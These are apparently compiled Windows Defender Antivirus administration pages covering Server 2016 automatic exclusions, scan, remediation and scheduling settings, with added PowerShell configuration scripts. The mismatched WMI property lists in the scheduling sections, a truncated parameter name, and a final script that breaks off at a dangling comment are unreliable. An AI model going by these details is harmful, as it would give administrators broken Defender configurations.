See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for more
information on how to use PowerShell with Windows Defender Antivirus.
Use Windows Management Instrumentation (WMI) to disable the auto-exclusions list on Windows Server
2016:
Use the Set method of the MSFT_MpPreference class for the following properties:

DisableAutoExclusions

See the following for more information and allowed parameters:


Windows Defender WMIv2 APIs

List of automatic exclusions


The following sections list the file paths and file types that the automatic exclusions cover.
Default exclusions for all roles
This section lists the default exclusions for all Windows Server 2016 roles.
Windows "temp.edb" files:
%windir%\SoftwareDistribution\Datastore\*\tmp.edb
%ProgramData%\Microsoft\Search\Data\Applications\Windows\*\*.log
Windows Update files or Automatic Update files:
%windir%\SoftwareDistribution\Datastore\*\Datastore.edb
%windir%\SoftwareDistribution\Datastore\*\edb.chk
%windir%\SoftwareDistribution\Datastore\*\edb*.log
%windir%\SoftwareDistribution\Datastore\*\Edb*.jrs
%windir%\SoftwareDistribution\Datastore\*\Res*.log
Windows Security files:
%windir%\Security\database\*.chk
%windir%\Security\database\*.edb
%windir%\Security\database\*.jrs
%windir%\Security\database\*.log
%windir%\Security\database\*.sdb
Group Policy files:
%allusersprofile%\NTUser.pol
%SystemRoot%\System32\GroupPolicy\Machine\registry.pol
%SystemRoot%\System32\GroupPolicy\User\registry.pol
WINS files:
%systemroot%\System32\Wins\*\*.chk
%systemroot%\System32\Wins\*\*.log
%systemroot%\System32\Wins\*\*.mdb
%systemroot%\System32\LogFiles\
%systemroot%\SysWow64\LogFiles\
File Replication Service (FRS) exclusions:
Files in the File Replication Service (FRS ) working folder. The FRS working folder is specified in
the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NtFrs\Parameters\Working Directory

%windir%\Ntfrs\jet\sys\*\edb.chk
%windir%\Ntfrs\jet\*\Ntfrs.jdb
%windir%\Ntfrs\jet\log\*\*.log
FRS Database log files. The FRS Database log file folder is specified in the registry key
HKEY_LOCAL_MACHINE\System\Currentcontrolset\Services\Ntfrs\Parameters\DB Log File
Directory

%windir%\Ntfrs\*\Edb*.log
The FRS staging folder. The staging folder is specified in the registry key
HKEY_LOCAL_MACHINE\System\Currentcontrolset\Services\NtFrs\Parameters\Replica
Sets\GUID\Replica Set Stage

%systemroot%\Sysvol\*\Nntfrs_cmp*\
The FRS preinstall folder. This folder is specified by the folder
Replica_root\DO_NOT_REMOVE_NtFrs_PreInstall_Directory

%systemroot%\SYSVOL\domain\DO_NOT_REMOVE_NtFrs_PreInstall_Directory\*\Ntfrs*\
The Distributed File System Replication (DFSR ) database and working folders. These
folders are specified by the registry key
HKEY_LOCAL_MACHINE\System\Currentcontrolset\Services\DFSR\Parameters\Replication
Groups\GUID\Replica Set Configuration File

NOTE
For custom locations, see Opt out of automatic exclusions.

%systemdrive%\System Volume Information\DFSR\$db_normal$


%systemdrive%\System Volume Information\DFSR\FileIDTable_*
%systemdrive%\System Volume Information\DFSR\SimilarityTable_*
%systemdrive%\System Volume Information\DFSR\*.XML
%systemdrive%\System Volume Information\DFSR\$db_dirty$
%systemdrive%\System Volume Information\DFSR\$db_clean$
%systemdrive%\System Volume Information\DFSR\$db_lostl$
%systemdrive%\System Volume Information\DFSR\Dfsr.db
%systemdrive%\System Volume Information\DFSR\*.frx
%systemdrive%\System Volume Information\DFSR\*.log
%systemdrive%\System Volume Information\DFSR\Fsr*.jrs
%systemdrive%\System Volume Information\DFSR\Tmp.edb
Process exclusions
%systemroot%\System32\dfsr.exe
%systemroot%\System32\dfsrs.exe
Hyper-V exclusions:
This section lists the file type exclusions, folder exclusions, and process exclusions that are
delivered automatically when you install the Hyper-V role
File type exclusions:
*.vhd
*.vhdx
*.avhd
*.avhdx
*.vsv
*.iso
*.rct
*.vmcx
*.vmrs
Folder exclusions:
%ProgramData%\Microsoft\Windows\Hyper-V
%ProgramFiles%\Hyper-V
%SystemDrive%\ProgramData\Microsoft\Windows\Hyper-V\Snapshots
%Public%\Documents\Hyper-V\Virtual Hard Disks
Process exclusions:
%systemroot%\System32\Vmms.exe
%systemroot%\System32\Vmwp.exe
SYSVOL files:
%systemroot%\Sysvol\Domain\*.adm
%systemroot%\Sysvol\Domain\*.admx
%systemroot%\Sysvol\Domain\*.adml
%systemroot%\Sysvol\Domain\Registry.pol
%systemroot%\Sysvol\Domain\*.aas
%systemroot%\Sysvol\Domain\*.inf
%systemroot%\Sysvol\Domain\*.Scripts.ini
%systemroot%\Sysvol\Domain\*.ins
%systemroot%\Sysvol\Domain\Oscfilter.ini
Active Directory exclusions
This section lists the exclusions that are delivered automatically when you install Active Directory Domain
Services.
NTDS database files. The database files are specified in the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\DSA Database File

%windir%\Ntds\ntds.dit
%windir%\Ntds\ntds.pat
The AD DS transaction log files. The transaction log files are specified in the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\Database Log Files

%windir%\Ntds\EDB*.log
%windir%\Ntds\Res*.log
%windir%\Ntds\Edb*.jrs
%windir%\Ntds\Ntds*.pat
%windir%\Ntds\EDB*.log
%windir%\Ntds\TEMP.edb
The NTDS working folder. This folder is specified in the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\DSA Working Directory
%windir%\Ntds\Temp.edb
%windir%\Ntds\Edb.chk
Process exclusions for AD DS and AD DS-related support files:
%systemroot%\System32\ntfrs.exe
%systemroot%\System32\lsass.exe
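The opt-out procedure above and the Active Directory list just given fit together in one scenario the TIP warns about: NTDS has been moved off %windir%, so the automatic exclusions no longer cover it. The following added script (not from the original article) derives the AD DS exclusions from the same registry values the list names (DSA Database File, Database Log Files, DSA Working Directory) instead of hard-coding %windir%\Ntds, then disables the automatic list and adds the derived entries with Add-MpPreference so existing custom exclusions are kept. Assumptions: it runs elevated on the domain controller, the log-directory value is looked up by the prefix "Database log files" to tolerate small differences in the value's exact name, and -Preview shows the plan without changing anything.

```powershell
# Added example (not from the original article): after opting out of automatic
# exclusions on a domain controller whose NTDS folders were relocated, rebuild
# the Active Directory exclusions from the registry values the list above names.
# Run elevated on the DC. Use -Preview to print the plan without applying it.

$NtdsParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'

function Get-NtdsExclusionSet {
    # Derives the AD DS file and process exclusions from the NTDS registry values.
    $p = Get-ItemProperty -Path $NtdsParams
    $dbFile  = $p.'DSA Database File'                      # e.g. D:\NTDS\ntds.dit
    $workDir = $p.'DSA Working Directory'                  # e.g. D:\NTDS
    # Assumption: match the log-directory value by prefix so that a slightly
    # different value name on the machine does not break the lookup.
    $logDir  = ($p.PSObject.Properties |
                Where-Object Name -like 'Database log files*' |
                Select-Object -First 1).Value
    if (-not $logDir) { $logDir = $workDir }              # default layout: colocated
    $dbDir = Split-Path -Parent $dbFile

    [pscustomobject]@{
        Paths = @(
            $dbFile
            (Join-Path $dbDir   'ntds.pat')
            (Join-Path $logDir  'EDB*.log')
            (Join-Path $logDir  'Res*.log')
            (Join-Path $logDir  'Edb*.jrs')
            (Join-Path $logDir  'Ntds*.pat')
            (Join-Path $logDir  'TEMP.edb')
            (Join-Path $workDir 'Temp.edb')
            (Join-Path $workDir 'Edb.chk')
        ) | Select-Object -Unique
        Processes = @(
            (Join-Path $env:SystemRoot 'System32\ntfrs.exe')
            (Join-Path $env:SystemRoot 'System32\lsass.exe')
        )
    }
}

function Set-ManualAdDsExclusions {
    param([switch]$Preview)
    $set = Get-NtdsExclusionSet
    if ($Preview) {
        'Would add path exclusions:';    $set.Paths     | ForEach-Object { "  $_" }
        'Would add process exclusions:'; $set.Processes | ForEach-Object { "  $_" }
        return
    }
    # Turn off the role-based automatic list, then add the derived entries with
    # Add-MpPreference so any existing custom exclusions are preserved.
    Set-MpPreference -DisableAutoExclusions $true
    Add-MpPreference -ExclusionPath    $set.Paths
    Add-MpPreference -ExclusionProcess $set.Processes
}

Set-ManualAdDsExclusions -Preview
```

Review the preview against the Active Directory exclusions list above before running without -Preview; the WARNING in Opt out of automatic exclusions applies, since a missed log or checkpoint file leaves the directory database exposed to scan-induced contention.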
DHCP Server exclusions
This section lists the exclusions that are delivered automatically when you install the DHCP Server role. The
DHCP Server file locations are specified by the DatabasePath, DhcpLogFilePath, and BackupDatabasePath
parameters in the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DHCPServer\Parameters
%systemroot%\System32\DHCP\*\*.mdb
%systemroot%\System32\DHCP\*\*.pat
%systemroot%\System32\DHCP\*\*.log
%systemroot%\System32\DHCP\*\*.chk
%systemroot%\System32\DHCP\*\*.edb
DNS Server exclusions
This section lists the file and folder exclusions and the process exclusions that are delivered automatically when
you install the DNS Server role.
File and folder exclusions for the DNS Server role:
%systemroot%\System32\Dns\*\*.log
%systemroot%\System32\Dns\*\*.dns
%systemroot%\System32\Dns\*\*.scc
%systemroot%\System32\Dns\*\BOOT
Process exclusions for the DNS Server role:
%systemroot%\System32\dns.exe
File and Storage Services exclusions
This section lists the file and folder exclusions that are delivered automatically when you install the File and
Storage Services role. The exclusions listed below do not include exclusions for the Clustering role.
%SystemDrive%\ClusterStorage
%clusterserviceaccount%\Local Settings\Temp
%SystemDrive%\mscs
Print Server exclusions
This section lists the file type exclusions, folder exclusions, and the process exclusions that are delivered
automatically when you install the Print Server role.
File type exclusions:
*.shd
*.spl
Folder exclusions. This folder is specified in the registry key
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Printers\DefaultSpoolDirectory

%system32%\spool\printers\*
Process exclusions:
spoolsv.exe
Web Server exclusions
This section lists the folder exclusions and the process exclusions that are delivered automatically when you
install the Web Server role.
Folder exclusions:
%SystemRoot%\IIS Temporary Compressed Files
%SystemDrive%\inetpub\temp\IIS Temporary Compressed Files
%SystemDrive%\inetpub\temp\ASP Compiled Templates
%systemDrive%\inetpub\logs
%systemDrive%\inetpub\wwwroot
Process exclusions:
%SystemRoot%\system32\inetsrv\w3wp.exe
%SystemRoot%\SysWOW64\inetsrv\w3wp.exe
%SystemDrive%\PHP5433\php-cgi.exe
Windows Server Update Services exclusions
This section lists the folder exclusions that are delivered automatically when you install the Windows Server
Update Services (WSUS) role. The WSUS folder is specified in the registry key
HKEY_LOCAL_MACHINE\Software\Microsoft\Update Services\Server\Setup

%systemroot%\WSUS\WSUSContent
%systemroot%\WSUS\UpdateServicesDBFiles
%systemroot%\SoftwareDistribution\Datastore
%systemroot%\SoftwareDistribution\Download

Related topics
Configure and validate exclusions for Windows Defender Antivirus scans
Configure and validate exclusions based on file name, extension, and folder location
Configure and validate exclusions for files opened by processes
Customize, initiate, and review the results of Windows Defender Antivirus scans and remediation
Windows Defender Antivirus in Windows 10
Configure Windows Defender Antivirus scanning options
4/5/2019 • 3 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Use Microsoft Intune to configure scanning options
See Configure device restriction settings in Microsoft Intune and Windows Defender Antivirus device restriction settings for
Windows 10 in Intune for more details.
Use Configuration Manager to configure scanning options:
See How to create and deploy antimalware policies: Scan settings for details on configuring System Center Configuration
Manager (current branch).
Use Group Policy to configure scanning options
To configure the Group Policy settings described in the following table:
1. On your Group Policy management computer, open the Group Policy Management Console, right-click the Group
Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative templates.
3. Expand the tree to Windows components > Windows Defender Antivirus and then the Location specified in
the table below.
4. Double-click the policy Setting as specified in the table below, and set the option to your desired configuration. Click
OK, and repeat for any other settings.

Each entry below gives the setting's description, its Location and setting under Windows components > Windows Defender
Antivirus, the default setting (if not configured), and the PowerShell Set-MpPreference parameter or WMI property for the
MSFT_MpPreference class.

Scan email (see Email scanning limitations below)
  Location and setting: Scan > Turn on e-mail scanning
  Default: Disabled
  PowerShell/WMI: -DisableEmailScanning

Scan reparse points
  Location and setting: Scan > Turn on reparse point scanning
  Default: Disabled
  PowerShell/WMI: Not available

Scan mapped network drives
  Location and setting: Scan > Run full scan on mapped network drives
  Default: Disabled
  PowerShell/WMI: -DisableScanningMappedNetworkDrivesForFullS

Scan archive files (such as .zip or .rar files). The extensions exclusion list will take precedence over this setting.
  Location and setting: Scan > Scan archive files
  Default: Enabled
  PowerShell/WMI: -DisableArchiveScanning

Scan files on the network
  Location and setting: Scan > Scan network files
  Default: Disabled
  PowerShell/WMI: -DisableScanningNetworkFiles

Scan packed executables
  Location and setting: Scan > Scan packed executables
  Default: Enabled
  PowerShell/WMI: Not available

Scan removable drives during full scans only
  Location and setting: Scan > Scan removable drives
  Default: Disabled
  PowerShell/WMI: -DisableRemovableDriveScanning

Specify the level of subfolders within an archive folder to scan
  Location and setting: Scan > Specify the maximum depth to scan archive files
  Default: 0
  PowerShell/WMI: Not available

Specify the maximum CPU load (as a percentage) during a scan. Note: This is not a hard limit but rather a guidance for the
scanning engine to not exceed this maximum on average.
  Location and setting: Scan > Specify the maximum percentage of CPU utilization during a scan
  Default: 50
  PowerShell/WMI: -ScanAvgCPULoadFactor

Specify the maximum size (in kilobytes) of archive files that should be scanned. The default, 0, applies no limit.
  Location and setting: Scan > Specify the maximum size of archive files to be scanned
  Default: No limit
  PowerShell/WMI: Not available

Configure low CPU priority for scheduled scans
  Location and setting: Scan > Configure low CPU priority for scheduled scans
  Default: Disabled
  PowerShell/WMI: Not available

NOTE
If real-time protection is enabled, files are scanned before they are accessed and executed. The scanning scope includes all files,
including those on mounted removable devices such as USB drives.

Use PowerShell to configure scanning options


See Manage Windows Defender Antivirus with PowerShell cmdlets and Defender cmdlets for more information on how to
use PowerShell with Windows Defender Antivirus.
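The Set-MpPreference parameters in the table map one-to-one onto Get-MpPreference properties, which makes an audit straightforward. The script below is an added example, not code from the original article: it compares the documented scan settings on the local machine against a baseline and applies only the settings that drifted, one Set-MpPreference call each. The baseline is a constructed policy (archive and network-file scanning on, CPU capped at 50); only the parameters spelled out in full in the table are used.

```powershell
# Added example (not from the original article): audit the scanning options
# from the table above against a baseline and repair drift. The baseline is a
# constructed policy; adjust it to your own standard. Only Get-MpPreference
# properties that appear in full in the table are referenced.

$ScanBaseline = @{
    DisableEmailScanning          = $true    # Turn on e-mail scanning: Disabled (default)
    DisableArchiveScanning        = $false   # Scan archive files: Enabled (default)
    DisableScanningNetworkFiles   = $false   # Scan network files: enabled by this baseline
    DisableRemovableDriveScanning = $true    # Scan removable drives: Disabled (default)
    ScanAvgCPULoadFactor          = 50       # Maximum average CPU during a scan
}

function Get-ScanSettingDrift {
    param([hashtable]$Baseline = $ScanBaseline)
    $current = Get-MpPreference
    foreach ($name in ($Baseline.Keys | Sort-Object)) {
        $actual = $current.$name
        [pscustomobject]@{
            Setting  = $name
            Expected = $Baseline[$name]
            Actual   = $actual
            InPolicy = ($actual -eq $Baseline[$name])
        }
    }
}

function Repair-ScanSettingDrift {
    # Applies only the settings that drifted, one call each, so the operational
    # change record shows exactly which setting moved.
    param([hashtable]$Baseline = $ScanBaseline)
    foreach ($d in (Get-ScanSettingDrift -Baseline $Baseline | Where-Object { -not $_.InPolicy })) {
        $splat = @{ $d.Setting = $d.Expected }
        Set-MpPreference @splat
        "Set $($d.Setting) = $($d.Expected)"
    }
}

Get-ScanSettingDrift | Format-Table -AutoSize
# Repair-ScanSettingDrift   # uncomment to enforce the baseline
```

Remember the precedence rule stated in the exclusion topics above: on a managed machine, Group Policy, Configuration Manager or Intune values win over local Set-MpPreference changes, so persistent drift reported here usually means the managed policy, not the local preference, needs correcting.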
Use WMI to configure scanning options
For using WMI classes, see Windows Defender WMIv2 APIs.
Email scanning limitations
We recommend using always-on real-time protection to protect against email-based malware.
Always-on protection scans emails as they arrive and as they are manipulated, just like normal files in the operating system.
This provides the strongest form of protection and is the recommended setting for scanning emails.
You can also use this Group Policy to enable scanning of older email files used by Outlook 2003 and older during on-
demand and scheduled scans. Embedded objects within an email file (such as attachments and archived files) are also
scanned. The following file format types can be scanned and remediated:
DBX
MBX
MIME
PST files used by Outlook 2003 or older (where the archive type is set to non-unicode) can also be scanned, but Windows
Defender cannot remediate threats detected inside PST files. This is another reason why we recommend using always-on
real-time protection to protect against email-based malware.
If Windows Defender Antivirus detects a threat inside an email, it will show you the following information to assist you in
identifying the compromised email, so you can remediate the threat:
Email subject
Attachment name
WARNING
There are some risks associated with scanning some Microsoft Outlook files and email messages. You can read about tips and risks
associated with scanning Outlook files and email messages in the following articles:
Scanning Outlook files in Outlook 2013
Scanning email messages in Outlook 2013

Related topics
Customize, initiate, and review the results of Windows Defender Antivirus scans and remediation
Configure and run on-demand Windows Defender Antivirus scans
Configure scheduled Windows Defender Antivirus scans
Windows Defender Antivirus in Windows 10
Configure remediation for Windows Defender Antivirus scans
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
When Windows Defender Antivirus runs a scan, it will attempt to remediate or remove threats that it finds.
You can configure how Windows Defender Antivirus should react to certain threats, whether it should create a
restore point before remediating, and when it should remove remediated threats.
This topic describes how to configure these settings with Group Policy, but you can also use System Center
Configuration Manager and Microsoft Intune.
You can also use the Set-MpPreference PowerShell cmdlet or MSFT_MpPreference WMI class to configure these
settings.

Configure remediation options


You can configure how remediation works with the Group Policy settings described in this section.
To configure these settings:
1. On your Group Policy management computer, open the Group Policy Management Console, right-click
the Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Defender Antivirus and then the Location
specified in the table below.
4. Double-click the policy Setting as specified in the table below, and set the option to your desired
configuration. Click OK, and repeat for any other settings.

LOCATION | SETTING | DESCRIPTION | DEFAULT SETTING (IF NOT CONFIGURED)

Scan | Create a system restore point | A system restore point will be created each day before cleaning or scanning is attempted | Disabled

Scan | Turn on removal of items from scan history folder | Specify how many days items should be kept in the scan history | 30 days

Root | Turn off routine remediation | You can specify whether Windows Defender Antivirus automatically remediates threats, or if it should ask the endpoint user what to do. | Disabled (threats are remediated automatically)

Quarantine | Configure removal of items from Quarantine folder | Specify how many days items should be kept in quarantine before being removed | Never removed

Threats | Specify threat alert levels at which default action should not be taken when detected | Every threat that is detected by Windows Defender Antivirus is assigned a threat level (low, medium, high, or severe). You can use this setting to define how all threats for each of the threat levels should be remediated (quarantined, removed, or ignored) | Not applicable

Threats | Specify threats upon which default action should not be taken when detected | Specify how specific threats (using their threat ID) should be remediated. You can specify whether the specific threat should be quarantined, removed, or ignored | Not applicable

IMPORTANT
Windows Defender Antivirus detects and remediates files based on many factors. Sometimes, completing a remediation
requires a reboot. Even if the detection is later determined to be a false positive, the reboot must be completed to
ensure all additional remediation steps have been completed.
If you are certain Windows Defender Antivirus quarantined a file based on a false positive, you can restore the file from
quarantine after the device reboots. See Restore quarantined files in Windows Defender Antivirus.
To avoid this problem in the future, you can exclude files from the scans. See Configure and validate exclusions for
Windows Defender Antivirus scans.

Also see Configure remediation-required scheduled full Windows Defender Antivirus scans for more
remediation-related settings.
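The script below is an added example, not code from the Microsoft page: it sets the remediation behaviour from the table above through the Set-MpPreference cmdlet the topic mentions (default action per threat level, a per-threat-ID override, quarantine and scan-history retention, daily restore point) and reads the result back. The parameter names are the documented Set-MpPreference parameters; the threat ID used in the override is a constructed placeholder, not a real ID.

```powershell
# Added example (not from the Microsoft page): configure remediation with
# Set-MpPreference, then read it back. Parameter names are the documented
# Set-MpPreference parameters; the threat ID below is a constructed placeholder.
#Requires -RunAsAdministrator

# Default action per threat level. Quarantine keeps the file recoverable, which is
# what you want while a detection might still turn out to be a false positive;
# Remove is reserved here for the severe level.
Set-MpPreference -LowThreatDefaultAction      Quarantine `
                 -ModerateThreatDefaultAction Quarantine `
                 -HighThreatDefaultAction     Quarantine `
                 -SevereThreatDefaultAction   Remove

# Per-threat override ("Specify threats upon which default action should not be
# taken"): the two arrays are positional pairs, Ids[i] is remediated with Actions[i].
$placeholderThreatId = 1234567890    # placeholder; real IDs come from Get-MpThreatCatalog
Set-MpPreference -ThreatIDDefaultAction_Ids     $placeholderThreatId `
                 -ThreatIDDefaultAction_Actions Quarantine

# Retention and restore point: keep quarantined items 90 days, scan history 30 days,
# and let the engine create a restore point before it cleans.
Set-MpPreference -QuarantinePurgeItemsAfterDelay 90 `
                 -ScanPurgeItemsAfterDelay       30 `
                 -DisableRestorePoint            $false

function Get-RemediationPolicy {
    # Read back the settings that govern remediation as one object, suitable for a
    # baseline comparison or a change record. The *DefaultAction properties are
    # reported as the underlying enum numbers by Get-MpPreference.
    Get-MpPreference | Select-Object LowThreatDefaultAction, ModerateThreatDefaultAction,
        HighThreatDefaultAction, SevereThreatDefaultAction,
        ThreatIDDefaultAction_Ids, ThreatIDDefaultAction_Actions,
        QuarantinePurgeItemsAfterDelay, ScanPurgeItemsAfterDelay, DisableRestorePoint
}

Get-RemediationPolicy | Format-List
```

Because quarantined items are what you restore after a false positive (see the IMPORTANT note above), a retention period that is at least as long as your investigation backlog is the setting to get right first.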

Related topics
Configure Windows Defender Antivirus scanning options
Configure scheduled Windows Defender Antivirus scans
Configure and run on-demand Windows Defender Antivirus scans
Configure the notifications that appear on endpoints
Configure end-user Windows Defender Antivirus interaction
Customize, initiate, and review the results of Windows Defender Antivirus scans and remediation
Windows Defender Antivirus in Windows 10
Configure scheduled quick or full Windows Defender Antivirus scans
4/8/2019 • 6 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

NOTE
By default, Windows Defender Antivirus checks for an update 15 minutes before the time of any scheduled scans.
To override this default, see Manage the schedule for when protection updates should be downloaded and applied.

In addition to always-on real-time protection and on-demand scans, you can set up regular, scheduled
scans.
You can configure the type of scan, when the scan should occur, and if the scan should occur after a
protection update or if the endpoint is being used. You can also specify when special scans to complete
remediation should occur.
This topic describes how to configure scheduled scans with Group Policy, PowerShell cmdlets, and WMI.
You can also configure scheduled scans with System Center Configuration Manager or Microsoft Intune.
To configure the Group Policy settings described in this topic:
1. On your Group Policy management machine, open the Group Policy Management Console, right-
click the Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration.
3. Click Administrative templates.
4. Expand the tree to Windows components > Windows Defender Antivirus and then the
Location specified in the table below.
5. Double-click the policy Setting as specified in the table below, and set the option to your desired
configuration. Click OK, and repeat for any other settings.
Also see the Manage when protection updates should be downloaded and applied and Prevent or allow
users to locally modify policy settings topics.

Quick scan versus full scan and custom scan


When you set up scheduled scans, you can set up whether the scan should be a full or quick scan.
Quick scans look at all the locations where there could be malware registered to start with the system,
such as registry keys and known Windows startup folders.
Combined with always-on real-time protection capability - which reviews files when they are opened and
closed, and whenever a user navigates to a folder - a quick scan helps provide strong coverage both for
malware that starts with the system and kernel-level malware.
In most instances, this means a quick scan is adequate to find malware that wasn't picked up by real-time
protection.
A full scan can be useful on endpoints that have encountered a malware threat to identify if there are any
inactive components that require a more thorough clean-up. In this instance, you may want to use a full
scan when running an on-demand scan.
A custom scan allows you to specify the files and folders to scan, such as a USB drive.

NOTE
By default, quick scans run on mounted removable devices, such as USB drives.

Set up scheduled scans


Scheduled scans will run at the day and time you specify. You can use Group Policy, PowerShell, and WMI
to configure scheduled scans.

NOTE
If a computer is unplugged and running on battery during a scheduled full scan, the scheduled scan will stop with
event 1002, which states that the scan stopped before completion. Windows Defender Antivirus will run a full scan
at the next scheduled time.

Use Group Policy to schedule scans:

LOCATION | SETTING | DESCRIPTION | DEFAULT SETTING (IF NOT CONFIGURED)

Scan | Specify the scan type to use for a scheduled scan | | Quick scan

Scan | Specify the day of the week to run a scheduled scan | Specify the day (or never) to run a scan. | Never

Scan | Specify the time of day to run a scheduled scan | Specify the number of minutes after midnight (for example, enter 60 for 1 am). | 2 am

Root | Randomize scheduled task times | In Windows Defender Antivirus: Randomize the start time of the scan to any interval from 0 to 4 hours. In FEP/SCEP: randomize to any interval plus or minus 30 minutes. This can be useful in VM or VDI deployments. | Enabled

Use PowerShell cmdlets to schedule scans:


Use the following cmdlets:
Set-MpPreference -ScanParameters
Set-MpPreference -ScanScheduleDay
Set-MpPreference -ScanScheduleTime
Set-MpPreference -RandomizeScheduleTaskTimes

See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for
more information on how to use PowerShell with Windows Defender Antivirus.
Use Windows Management Instrumentation (WMI) to schedule scans:
Use the Set method of the MSFT_MpPreference class for the following properties:

SignatureFallbackOrder
SignatureDefinitionUpdateFileSharesSources

See the following for more information and allowed parameters:


Windows Defender WMIv2 APIs

Start scheduled scans only when the endpoint is not in use


You can set the scheduled scan to only occur when the endpoint is turned on but not in use with Group
Policy, PowerShell, or WMI.
Use Group Policy to schedule scans

LOCATION | SETTING | DESCRIPTION | DEFAULT SETTING (IF NOT CONFIGURED)

Scan | Start the scheduled scan only when computer is on but not in use | Scheduled scans will not run, unless the computer is on but not in use | Enabled

Use PowerShell cmdlets:


Use the following cmdlets:

Set-MpPreference -ScanOnlyIfIdleEnabled

See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for
more information on how to use PowerShell with Windows Defender Antivirus.
Use Windows Management Instrumentation (WMI):
Use the Set method of the MSFT_MpPreference class for the following properties:

SignatureFallbackOrder
SignatureDefinitionUpdateFileSharesSources

See the following for more information and allowed parameters:


Windows Defender WMIv2 APIs

Configure when full scans should be run to complete remediation


Some threats may require a full scan to complete their removal and remediation. You can schedule when
these scans should occur with Group Policy, PowerShell, or WMI.
Use Group Policy to schedule remediation-required scans

LOCATION | SETTING | DESCRIPTION | DEFAULT SETTING (IF NOT CONFIGURED)

Remediation | Specify the day of the week to run a scheduled full scan to complete remediation | Specify the day (or never) to run a scan. | Never

Remediation | Specify the time of day to run a scheduled full scan to complete remediation | Specify the number of minutes after midnight (for example, enter 60 for 1 am) | 2 am

Use PowerShell cmdlets:


Use the following cmdlets:

Set-MpPreference -RemediationScheduleDay
Set-MpPreference -RemediationScheduleTime

See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for
more information on how to use PowerShell with Windows Defender Antivirus.
Use Windows Management Instrumentation (WMI):
Use the Set method of the MSFT_MpPreference class for the following properties:

SignatureFallbackOrder
SignatureDefinitionUpdateFileSharesSources

See the following for more information and allowed parameters:


Windows Defender WMIv2 APIs

Set up daily quick scans


You can enable a daily quick scan that can be run in addition to your other scheduled scans with Group
Policy, PowerShell, or WMI.
Use Group Policy to schedule daily scans:

LOCATION | SETTING | DESCRIPTION | DEFAULT SETTING (IF NOT CONFIGURED)

Scan | Specify the interval to run quick scans per day | Specify how many hours should elapse before the next quick scan. For example, to run every two hours, enter 2, for once a day, enter 24. Enter 0 to never run a daily quick scan. | Never

Scan | Specify the time for a daily quick scan | Specify the number of minutes after midnight (for example, enter 60 for 1 am) | 2 am

Use PowerShell cmdlets to schedule daily scans:


Use the following cmdlets:

Set-MpPreference -ScanScheduleQuickScanTime

See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for
more information on how to use PowerShell with Windows Defender Antivirus.
Use Windows Management Instrumentation (WMI) to schedule daily scans:
Use the Set method of the MSFT_MpPreference class for the following properties:

SignatureFallbackOrder
SignatureDefinitionUpdateFileSharesSources

See the following for more information and allowed parameters:


Windows Defender WMIv2 APIs

Enable scans after protection updates


You can force a scan to occur after every protection update with Group Policy.
Use Group Policy to schedule scans after protection updates

LOCATION | SETTING | DESCRIPTION | DEFAULT SETTING (IF NOT CONFIGURED)

Signature updates | Turn on scan after Security intelligence update | A scan will occur immediately after a new protection update is downloaded | Enabled
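The following script is an added example, not code from the Microsoft page: it brings together the scheduled scan, the idle-only condition, the remediation scan and the daily quick scan that the sections above configure one cmdlet at a time, and then prints the effective schedule with the numeric day values translated. The cmdlet and parameter names are the documented Set-MpPreference and Get-MpPreference ones; the days and times are constructed for illustration, and the final WMI call assumes that the Set method of MSFT_MpPreference accepts the preference properties as named arguments, as the WMIv2 API documentation describes.

```powershell
# Added example (not from the Microsoft page): configure the scan schedule with
# Set-MpPreference and report it back. Days and times are constructed values.
#Requires -RunAsAdministrator

# Weekly full scan on Saturday at 02:00 local time, randomised so a fleet of VMs
# does not start at the same second, and only while the machine is on but idle.
Set-MpPreference -ScanParameters              FullScan `
                 -ScanScheduleDay             Saturday `
                 -ScanScheduleTime            02:00:00 `
                 -RandomizeScheduleTaskTimes  $true `
                 -ScanOnlyIfIdleEnabled       $true

# Full scan that completes remediation for threats that need one: Sunday at 03:00.
Set-MpPreference -RemediationScheduleDay  Sunday `
                 -RemediationScheduleTime 03:00:00

# Daily quick scan at 12:00 in addition to the weekly full scan.
Set-MpPreference -ScanScheduleQuickScanTime 12:00:00

function Get-ScanSchedule {
    # Return the effective schedule as one object. Get-MpPreference reports the day
    # settings as numbers (0 = every day, 1 = Sunday ... 7 = Saturday, 8 = never) and
    # the scan type as 1 (quick) or 2 (full); the maps below make the report readable.
    $dayName = @{ 0 = 'Everyday'; 1 = 'Sunday';   2 = 'Monday'; 3 = 'Tuesday'
                  4 = 'Wednesday'; 5 = 'Thursday'; 6 = 'Friday'; 7 = 'Saturday'; 8 = 'Never' }
    $scanType = @{ 1 = 'QuickScan'; 2 = 'FullScan' }
    $p = Get-MpPreference
    [pscustomobject]@{
        ScanType            = $scanType[[int]$p.ScanParameters]
        ScheduledScanDay    = $dayName[[int]$p.ScanScheduleDay]
        ScheduledScanTime   = $p.ScanScheduleTime
        RandomizeStart      = $p.RandomizeScheduleTaskTimes
        OnlyWhenIdle        = $p.ScanOnlyIfIdleEnabled
        RemediationScanDay  = $dayName[[int]$p.RemediationScheduleDay]
        RemediationScanTime = $p.RemediationScheduleTime
        DailyQuickScanTime  = $p.ScanScheduleQuickScanTime
    }
}

Get-ScanSchedule | Format-List

# The same kind of change through WMI, which is what the WMI sections above refer to.
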